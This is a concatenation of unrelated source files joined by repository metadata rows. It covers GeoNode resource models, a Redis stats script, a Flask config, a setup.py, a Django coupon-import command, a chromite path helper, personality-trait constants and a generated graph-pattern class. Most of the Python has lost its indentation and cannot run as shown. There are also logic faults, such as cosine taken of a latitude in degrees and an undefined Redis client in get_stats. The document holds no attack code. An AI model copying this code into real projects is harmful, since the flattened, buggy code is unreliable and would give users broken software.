self.bbox_y1 = box[3]
def set_bounds_from_center_and_zoom(self, center_x, center_y, zoom):
"""
Calculate zoom level and center coordinates in mercator.
"""
self.center_x = center_x
self.center_y = center_y
self.zoom = zoom
deg_len_equator = 40075160 / 360
# covert center in lat lon
def get_lon_lat():
wgs84 = Proj(init='epsg:4326')
mercator = Proj(init='epsg:3857')
lon, lat = transform(mercator, wgs84, center_x, center_y)
return lon, lat
# calculate the degree length at this latitude
def deg_len():
lon, lat = get_lon_lat()
return math.cos(lat) * deg_len_equator
lon, lat = get_lon_lat()
# taken from http://wiki.openstreetmap.org/wiki/Zoom_levels
        # it might not be precise, but it is enough for the purpose
distance_per_pixel = 40075160 * math.cos(lat)/2**(zoom+8)
# calculate the distance from the center of the map in degrees
# we use the calculated degree length on the x axis and the
        # normal degree length on the y axis, assuming that it does not change
# Assuming a map of 1000 px of width and 700 px of height
distance_x_degrees = distance_per_pixel * 500 / deg_len()
distance_y_degrees = distance_per_pixel * 350 / deg_len_equator
self.bbox_x0 = lon - distance_x_degrees
self.bbox_x1 = lon + distance_x_degrees
self.bbox_y0 = lat - distance_y_degrees
self.bbox_y1 = lat + distance_y_degrees
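    # Worked example of the scale formula above (illustrative numbers): at the
    # equator (lat = 0) and zoom 0, distance_per_pixel = 40075160 / 2**8
    # ~= 156543 m; at zoom 10 it is 40075160 / 2**18 ~= 153 m. The bbox then
    # spans 500 of those pixel-distances east-west and 350 north-south on
    # each side of the center.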
def set_bounds_from_bbox(self, bbox):
"""
Calculate zoom level and center coordinates in mercator.
"""
self.set_latlon_bounds(bbox)
minx, miny, maxx, maxy = [float(c) for c in bbox]
x = (minx + maxx) / 2
y = (miny + maxy) / 2
(center_x, center_y) = forward_mercator((x, y))
xdiff = maxx - minx
ydiff = maxy - miny
zoom = 0
if xdiff > 0 and ydiff > 0:
width_zoom = math.log(360 / xdiff, 2)
height_zoom = math.log(360 / ydiff, 2)
zoom = math.ceil(min(width_zoom, height_zoom))
self.zoom = zoom
self.center_x = center_x
self.center_y = center_y
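    # Worked example (illustrative numbers): for a bbox spanning 10 degrees of
    # longitude and 5 degrees of latitude, width_zoom = log2(360 / 10) ~= 5.17
    # and height_zoom = log2(360 / 5) ~= 6.17, so zoom = ceil(min(...)) = 6.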
def download_links(self):
"""assemble download links for pycsw"""
links = []
for url in self.link_set.all():
if url.link_type == 'metadata': # avoid recursion
continue
if url.link_type == 'html':
links.append((self.title, 'Web address (URL)', 'WWW:LINK-1.0-http--link', url.url))
elif url.link_type in ('OGC:WMS', 'OGC:WFS', 'OGC:WCS'):
links.append((self.title, url.name, url.link_type, url.url))
else:
description = '%s (%s Format)' % (self.title, url.name)
links.append((self.title, description, 'WWW:DOWNLOAD-1.0-http--download', url.url))
return links
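# Shape of the returned list (hypothetical values):
#   [('Roads', 'Web address (URL)', 'WWW:LINK-1.0-http--link', 'http://example.org/roads'),
#    ('Roads', 'Roads (SHAPE-ZIP Format)', 'WWW:DOWNLOAD-1.0-http--download', 'http://example.org/roads.zip')]
# pycsw consumes these (title, description, protocol, url) tuples directly.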
def get_tiles_url(self):
"""Return URL for Z/Y/X mapping clients or None if it does not exist.
"""
try:
tiles_link = self.link_set.get(name='Tiles')
except Link.DoesNotExist:
return None
else:
return tiles_link.url
def get_legend(self):
"""Return Link for legend or None if it does not exist.
"""
try:
legends_link = self.link_set.get(name='Legend')
except Link.DoesNotExist:
return None
except Link.MultipleObjectsReturned:
return None
else:
return legends_link
def get_legend_url(self):
"""Return URL for legend or None if it does not exist.
The legend can be either an image (for Geoserver's WMS)
or a JSON object for ArcGIS.
"""
legend = self.get_legend()
if legend is None:
return None
return legend.url
def get_ows_url(self):
"""Return URL for OGC WMS server None if it does not exist.
"""
try:
ows_link = self.link_set.get(name='OGC:WMS')
except Link.DoesNotExist:
return None
else:
return ows_link.url
def get_thumbnail_url(self):
"""Return a thumbnail url.
It could be a local one if it exists, a remote one (WMS GetImage) for example
or a 'Missing Thumbnail' one.
"""
local_thumbnails = self.link_set.filter(name='Thumbnail')
if local_thumbnails.count() > 0:
return local_thumbnails[0].url
remote_thumbnails = self.link_set.filter(name='Remote Thumbnail')
if remote_thumbnails.count() > 0:
return remote_thumbnails[0].url
return staticfiles.static(settings.MISSING_THUMBNAIL)
def has_thumbnail(self):
"""Determine if the thumbnail object exists and an image exists"""
return self.link_set.filter(name='Thumbnail').exists()
def save_thumbnail(self, filename, image):
upload_to = 'thumbs/'
upload_path = os.path.join('thumbs/', filename)
if storage.exists(upload_path):
# Delete if exists otherwise the (FileSystemStorage) implementation
# will create a new file with a unique name
storage.delete(upload_path)
storage.save(upload_path, ContentFile(image))
url_path = os.path.join(settings.MEDIA_URL, upload_to, filename).replace('\\', '/')
url = urljoin(settings.SITEURL, url_path)
Link.objects.get_or_create(resource=self,
url=url,
defaults=dict(
name='Thumbnail',
extension='png',
mime='image/png',
link_type='image',
))
ResourceBase.objects.filter(id=self.id).update(
thumbnail_url=url
)
def set_missing_info(self):
"""Set default permissions and point of contacts.
It is mandatory to call it from descendant classes
but hard to enforce technically via signals or save overriding.
"""
from guardian.models import UserObjectPermission
logger.debug('Checking for permissions.')
# True if any custom user permissions have been set for this resource.
has_custom_permissions = UserObjectPermission.objects.filter(
content_type=ContentType.objects.get_for_model(self.get_self_resource()),
object_pk=str(self.pk)
).exists()
if not has_custom_permissions:
logger.debug('There are no permissions for this object, setting default perms.')
self.set_default_permissions()
if self.owner:
user = self.owner
else:
user = ResourceBase.objects.admin_contact().user
if self.poc is None:
self.poc = user
if self.metadata_author is None:
self.metadata_author = user
def maintenance_frequency_title(self):
return [v for i, v in enumerate(UPDATE_FREQUENCIES) if v[0] == self.maintenance_frequency][0][1].title()
def language_title(self):
return [v for i, v in enumerate(ALL_LANGUAGES) if v[0] == self.language][0][1].title()
def _set_poc(self, poc):
# reset any poc assignation to this resource
ContactRole.objects.filter(role='pointOfContact', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='pointOfContact', resource=self, contact=poc)
def _get_poc(self):
try:
the_poc = ContactRole.objects.get(role='pointOfContact', resource=self).contact
except ContactRole.DoesNotExist:
the_poc = None
return the_poc
poc = property(_get_poc, _set_poc)
def _set_metadata_author(self, metadata_author):
# reset any metadata_author assignation to this resource
ContactRole.objects.filter(role='author', resource=self).delete()
# create the new assignation
ContactRole.objects.create(role='author', resource=self, contact=metadata_author)
def _get_metadata_author(self):
try:
the_ma = ContactRole.objects.get(role='author', resource=self).contact
except ContactRole.DoesNotExist:
the_ma = None
return the_ma
metadata_author = property(_get_metadata_author, _set_metadata_author)
objects = ResourceBaseManager()
class Meta:
# custom permissions,
# add, change and delete are standard in django-guardian
permissions = (
('view_resourcebase', 'Can view resource'),
('change_resourcebase_permissions', 'Can change resource permissions'),
('download_resourcebase', 'Can download resource'),
('publish_resourcebase', 'Can publish resource'),
('change_resourcebase_metadata', 'Can change resource metadata'),
)
class LinkManager(models.Manager):
"""Helper class to access links grouped by type
"""
def data(self):
return self.get_queryset().filter(link_type='data')
def image(self):
return self.get_queryset().filter(link_type='image')
def download(self):
return self.get_queryset().filter(link_type__in=['image', 'data'])
def metadata(self):
return self.get_queryset().filter(link_type='metadata')
def original(self):
return self.get_queryset().filter(link_type='original')
def geogig(self):
return self.get_queryset().filter(name__icontains='geogig')
def ows(self):
return self.get_queryset().filter(link_type__in=['OGC:WMS', 'OGC:WFS', 'OGC:WCS'])
class Link(models.Model):
"""Auxiliary model for storing links for resources.
This helps avoiding the need for runtime lookups
to the OWS server or the CSW Catalogue.
There are several types of links:
* original: For uploaded files (Shapefiles or GeoTIFFs)
* data: For WFS and WCS links that allow access to raw data
* image: For WMS and TMS links
* metadata: For CSW links
* OGC:WMS: for WMS service links
* OGC:WFS: for WFS service links
* OGC:WCS: for WCS service links
"""
resource = models.ForeignKey(ResourceBase)
extension = models.CharField(max_length=255, help_text=_('For example "kml"'))
link_type = models.CharField(max_length=255, choices=[(x, x) for x in LINK_TYPES])
name = models.CharField(max_length=255, help_text=_('For example "View in Google Earth"'))
mime = models.CharField(max_length=255, help_text=_('For example "text/xml"'))
url = models.TextField(max_length=1000)
objects = LinkManager()
def __str__(self):
return '%s link' % self.link_type
def resourcebase_post_save(instance, *args, **kwargs):
"""
Used to fill any additional fields after the save.
Has to be called by the children
"""
ResourceBase.objects.filter(id=instance.id).update(
thumbnail_url=instance.get_thumbnail_url(),
detail_url=instance.get_absolute_url(),
csw_insert_date=datetime.datetime.now())
instance.set_missing_info()
# we need to remove stale links
for link in instance.link_set.all():
if link.name == "External Document":
if link.resource.doc_url != link.url:
link.delete()
else:
if urlsplit(settings.SITEURL).hostname not in link.url:
link.delete()
def rating_post_save(instance, *args, **kwargs):
"""
Used to fill the average rating field on OverallRating change.
"""
ResourceBase.objects.filter(id=instance.object_id).update(rating=instance.rating)
signals.post_save.connect(rating_post_save, sender=OverallRating)
| gpl-3.0 | 8,784,097,328,487,510,000 | 39.583235 | 120 | 0.616367 | false |
orkestra-studios/nebuu-service | stats.py | 1 | 2397 | from datetime import date, datetime
from services import *
from collections import defaultdict
import sys
import json  # json.loads is used below; the wildcard import from services may also provide it
CATEGORIES = ["populerkultur", "yazmevsimi", "kismevsimi", "yesilcam", "emojiler", "gol", "turkdizileri", "evlilik", "para", "kultursanat", "sesinicikar", "ikililer", "okul", "taklit", "osmanli", "markalar", "parti", "neyapiyorum", "ruhhali", "2000ler", "cizgifilm", "hayvanlar", "90lar", "sarkilar", "muzisyenler", "meslekler", "2015geyikleri", "superkahramanlar", "filmler", "diziler", "ankara", "vucudumuzutaniyalim", "yermekan", "mutfak", "istanbul", "sehirler", "2014", "spordunyasi", "oyunlar", "tarih", "futboltakimlari", "bayram", "2013", "teknolojibilgisayar"]
OPEN_KEY = "co.orkestra.nebuu.event.open"
PLAY_KEY = "co.orkestra.nebuu.event.play"
BUY_KEY = "co.orkestra.nebuu.event.buy"
def get_opens(rdb, start, end=None):
OPEN_KEY = "co.orkestra.nebuu.event.open"
start_s = int(datetime.strptime(start, '%d-%m-%Y').strftime('%s'))
end_s = int(datetime.strptime(end, '%d-%m-%Y').strftime('%s')) if end else start_s+86399
dspan = [start_s, end_s]
load = lambda key: map(
json.loads,
rdb.smembers(key)
)
opens_raw = load(OPEN_KEY)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
opens_raw
)
)
)
return len(opened)
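# Usage sketch (illustrative, not part of the original module; assumes `rdb` is the
# redis client exported by services):
#   n = get_opens(rdb, '01-01-2015', '07-01-2015')
#   print 'opens in that window:', n
# Dates are parsed with '%d-%m-%Y'; when `end` is omitted the window is a single day.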
def get_stats(for_date):
dspan = [int(datetime.strptime(for_date, '%d-%m-%Y').strftime('%s'))]
dspan += [dspan[0]+86400]
load = lambda key: map(
json.loads,
rdb.smembers(key)
)
opened = set(
map(lambda e: e['uid'],
filter(
lambda e: 'uid' in e and 'when' in e and dspan[0]<e['when']<dspan[1],
load(OPEN_KEY)
)
)
)
played = defaultdict(int)
for e in []:#load(PLAY_KEY):
try:
assert(e['category'] in CATEGORIES)
played[e['category']] += 1
except: pass
played['total'] = sum(played.values())
return len(opened),played
if __name__ == '__main__':
dt = sys.argv[1]
try:
dtt = sys.argv[2]
except: dtt = None
# get_opens expects the redis connection first; assume `rdb` is exported by services
stats = get_opens(rdb, dt, dtt)
print 'opened:', stats
| gpl-3.0 | 4,208,475,431,737,372,000 | 33.242857 | 569 | 0.54902 | false |
danmilon/fragofonias | app.py | 1 | 1092 | from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
from flask.json import JSONEncoder
from datetime import date, datetime
import os
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://%s:%s@localhost/csa?charset=utf8' % (
os.environ['CSA_DB_USERNAME'], os.environ['CSA_DB_PASSWORD']
)
sqlite_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'db.sqlite')
app.config['SQLALCHEMY_BINDS'] = {
'wallet': 'sqlite:///' + sqlite_path
}
app.config['SQLALCHEMY_ECHO'] = False
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
try:
if isinstance(obj, date):
return JSONEncoder.default(
self,
datetime(obj.year, obj.month, obj.day))
iterable = iter(obj)
except TypeError:
pass
else:
return list(iterable)
return JSONEncoder.default(self, obj)
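# Illustrative behaviour of the encoder (not part of the original file):
#   - date objects are promoted to datetime before being handed to Flask's JSONEncoder,
#     e.g. date(2015, 1, 31) is serialised like datetime(2015, 1, 31, 0, 0, 0)
#   - any other iterable (sets, generators, query results) is serialised as a JSON list
#   - everything else falls through to JSONEncoder.default and raises TypeError as usual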
app.json_encoder = CustomJSONEncoder
| mit | 2,123,392,683,379,252,500 | 28.513514 | 94 | 0.624542 | false |
sambarluc/xmitgcm | setup.py | 1 | 1468 | #!/usr/bin/env python
import os
import re
import sys
import warnings
from setuptools import setup, find_packages
VERSION = '0.2.1'
DISTNAME = 'xmitgcm'
LICENSE = 'Apache'
AUTHOR = 'Ryan Abernathey'
AUTHOR_EMAIL = '[email protected]'
URL = 'https://github.com/xgcm/xmitgcm'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['xarray >= 0.8.2', 'dask >= 0.12']
SETUP_REQUIRES = ['pytest-runner']
TESTS_REQUIRE = ['pytest >= 2.8', 'coverage']
DESCRIPTION = "Read MITgcm mds binary files into xarray"
def readme():
with open('README.rst') as f:
return f.read()
setup(name=DISTNAME,
version=VERSION,
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=readme(),
install_requires=INSTALL_REQUIRES,
setup_requires=SETUP_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages())
| mit | 8,516,770,780,736,620,000 | 27.784314 | 57 | 0.658719 | false |
Necrote/PsyHeal | src/modules/Constants.py | 1 | 1897 | Openness = ['Adventurousness','Artistic interests','Emotionality','Imagination','Intellect','Authority-challenging']
Conscientiousness = ['Achievement striving','Cautiousness','Dutifulness','Orderliness','Self-discipline','Self-efficacy']
Extraversion = ['Activity level','Assertiveness','Cheerfulness','Excitement-seeking','Outgoing','Gregariousness']
Agreeableness = ['Altruism','Cooperation','Modesty','Uncompromising','Sympathy','Trust']
EmotionalRange = ['Fiery','Prone to worry','Melancholy','Immoderation','Self-consciousness','Susceptible to stress']
OpAttri = Openness#[ Openness[0] , Openness[2] , Openness[3]]
ConAttri = Conscientiousness#[ Conscientiousness[0] , Conscientiousness[1] , Conscientiousness[2]]
ExtraAttri = Extraversion#[ Extraversion[0] , Extraversion[1] , Extraversion[2]]
AgreeAttri = Agreeableness#[ Agreeableness[1] , Agreeableness[2] , Agreeableness[4]]
EmoAttri = EmotionalRange#[ EmotionalRange[2] , EmotionalRange[4] , EmotionalRange[5]]
personality_traits = ["Openness","Conscientiousness","Extraversion","Agreeableness","Emotional range"]
combinedTraits = [OpAttri,ConAttri,ExtraAttri,AgreeAttri,EmoAttri]
recordLimit = 10
CriticalCount = 3
SelectedAttributes = ['Cautiousness','Melancholy','Self-consciousness','Susceptible to stress','Prone to worry','Authority-challenging','Immoderation','Sympathy','Trust','Cheerfulness']
Constraints = {
'Authority-challenging' : [92.00,100.00],
'Cautiousness' : [93.00,99.00],
'Sympathy' : [0.00,0.15],
'Trust' : [0.00,0.15],
'Prone to worry' : [85.00,100.00],
'Melancholy' : [88.00,100.00],
'Immoderation' : [80.00,100.00],
'Self-consciousness' : [75.00,100.00],
'Susceptible to stress' : [80.00,100.00],
'Cheerfulness' : [0.00,20.00]
} | mit | -899,639,483,063,021,600 | 54.823529 | 185 | 0.672114 | false |
EuroPython/epcon | p3/management/commands/create_bulk_coupons.py | 1 | 2939 |
""" Create a batch of single use discount coupons from a CSV file.
Parameters: <conference> <csv-file>
Creates coupons based on the CSV file contents:
code - coupon code
max_usage - max. number of uses
items_per_usage - max number of items per use
value - value of the coupon in percent
description - description
fares - comma separated list of included fares
Use --dry-run to test drive the script.
"""
import sys
import csv
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from conference import models as cmodels
from assopy.models import Coupon
###
class Command(BaseCommand):
args = '<conference> <count>'
# Dry run ?
dry_run = False
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('conference')
parser.add_argument('csv')
# Named (optional) arguments
parser.add_argument('--dry-run',
action='store_true',
dest='dry_run',
default=False,
help='Do everything except create the coupons')
@transaction.atomic
def handle(self, *args, **options):
conference = cmodels.Conference.objects.get(code=options['conference'])
self.dry_run = options.get('dry_run', False)
csv_filename = options['csv']
# Get set of existing coupon codes
all_codes = set(c['code'] for c in Coupon.objects\
.filter(conference=conference.code)\
.values('code'))
# Valid fares (conference fares only)
all_fares = cmodels.Fare.objects\
.filter(conference=conference.code)
# Create coupons
if csv_filename == 'stdin':
csv_file = sys.stdin
else:
csv_file = open(csv_filename)
with csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
code = row['code'].strip()
if not code:
# Skip lines without code
continue
if code in all_codes:
# Skip coupons which already exist
print ('Coupon %r already exists - skipping' % code)
continue
c = Coupon(conference=conference)
c.code = code
c.max_usage = int(row.get('max_usage', 1))
c.items_per_usage = int(row.get('items_per_usage', 1))
c.value = row['value']
c.description = row.get('description', '')
if not self.dry_run:
c.save()
c.fares = all_fares.filter(
code__in = [x.strip()
for x in row['fares'].split(',')])
print ('Coupon %r created' % c.code)
| bsd-2-clause | 2,320,317,015,816,716,000 | 30.945652 | 79 | 0.539639 | false |
mxOBS/deb-pkg_trusty_chromium-browser | third_party/chromite/lib/paygen/fixup_path.py | 1 | 1342 | # Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper for other scripts that need a PYTHONPATH entry for crostools.
Generally used by import statements of the form:
from chromite.lib.paygen import foo
from crostools.scripts import foo
"""
# pylint: disable=bad-continuation
from __future__ import print_function
import os.path
import sys
# Find the correct root path to insert into sys.path for importing
# modules in this source.
CROSTOOLS_ROOT = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..'))
CROSTOOLS_PATH_ROOT = os.path.dirname(CROSTOOLS_ROOT)
CROS_SRC_PLATFORM_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'platform')
CROS_AUTOTEST_PATH = os.path.join(CROSTOOLS_PATH_ROOT, 'src', 'third_party',
'autotest', 'files')
def _SysPathPrepend(dir_name):
"""Prepend a directory to Python's import path."""
if os.path.isdir(dir_name) and dir_name not in sys.path:
sys.path.insert(0, dir_name)
def FixupPath():
_SysPathPrepend(CROS_AUTOTEST_PATH)
_SysPathPrepend(CROS_SRC_PLATFORM_PATH)
_SysPathPrepend(CROSTOOLS_PATH_ROOT)
# TODO(dgarrett): Remove this call after all importers do it locally.
FixupPath()
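# After the prepends above sys.path starts with (illustrative ordering, assuming all
# directories exist): [CROSTOOLS_PATH_ROOT, CROS_SRC_PLATFORM_PATH, CROS_AUTOTEST_PATH, ...],
# which is what makes imports such as "from chromite.lib.paygen import foo" resolvable.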
| bsd-3-clause | 203,790,605,844,258,900 | 28.173913 | 77 | 0.717586 | false |
levilucio/SyVOLT | GM2AUTOSAR_MM/Properties/from_eclipse/HP1_ConnectedLHS.py | 1 | 19004 | from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HP1_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HP1_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HP1_ConnectedLHS, self).__init__(name='HP1_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'P1')
# Set the node attributes
# match class PhysicalNode() node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["mm__"] = """MT_pre__PhysicalNode"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Partition() node
self.add_node()
self.vs[1]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """2"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["mm__"] = """MT_pre__Partition"""
self.vs[1]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Module() node
self.add_node()
self.vs[2]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """3"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["mm__"] = """MT_pre__Module"""
self.vs[2]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Scheduler() node
self.add_node()
self.vs[3]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """4"""
self.vs[3]["MT_dirty__"] = False
self.vs[3]["mm__"] = """MT_pre__Scheduler"""
self.vs[3]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Service() node
self.add_node()
self.vs[4]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[4]["MT_label__"] = """5"""
self.vs[4]["MT_dirty__"] = False
self.vs[4]["mm__"] = """MT_pre__Service"""
self.vs[4]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# Nodes that represent the edges of the property.
# match association PhysicalNode--partition-->Partition node
self.add_node()
self.vs[5]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
"""
self.vs[5]["MT_label__"] = """6"""
self.vs[5]["MT_subtypes__"] = []
self.vs[5]["MT_dirty__"] = False
self.vs[5]["mm__"] = """MT_pre__directLink_S"""
self.vs[5]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc5')
# match association Partition--module-->Module node
self.add_node()
self.vs[6]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
"""
self.vs[6]["MT_label__"] = """7"""
self.vs[6]["MT_subtypes__"] = []
self.vs[6]["MT_dirty__"] = False
self.vs[6]["mm__"] = """MT_pre__directLink_S"""
self.vs[6]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc6')
# match association Module--scheduler-->Scheduler node
self.add_node()
self.vs[7]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
"""
self.vs[7]["MT_label__"] = """8"""
self.vs[7]["MT_subtypes__"] = []
self.vs[7]["MT_dirty__"] = False
self.vs[7]["mm__"] = """MT_pre__directLink_S"""
self.vs[7]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc7')
# match association Scheduler--provided-->Service node
self.add_node()
self.vs[8]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
"""
self.vs[8]["MT_label__"] = """9"""
self.vs[8]["MT_subtypes__"] = []
self.vs[8]["MT_dirty__"] = False
self.vs[8]["mm__"] = """MT_pre__directLink_S"""
self.vs[8]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc8')
# Add the edges
self.add_edges([
(0,5), # match_class PhysicalNode() -> association partition
(5,1), # association partition -> match_class Partition()
(1,6), # match_class Partition() -> association module
(6,2), # association module -> match_class Module()
(2,7), # match_class Module() -> association scheduler
(7,3), # association scheduler -> match_class Scheduler()
(3,8), # match_class Scheduler() -> association provided
(8,4) # association provided -> match_class Service()
])
# Add the attribute equations
self["equations"] = []
def eval_attr11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr12(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr13(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr14(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr15(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr16(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "partition"
def eval_attr17(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "module"
def eval_attr18(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "scheduler"
def eval_attr19(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "provided"
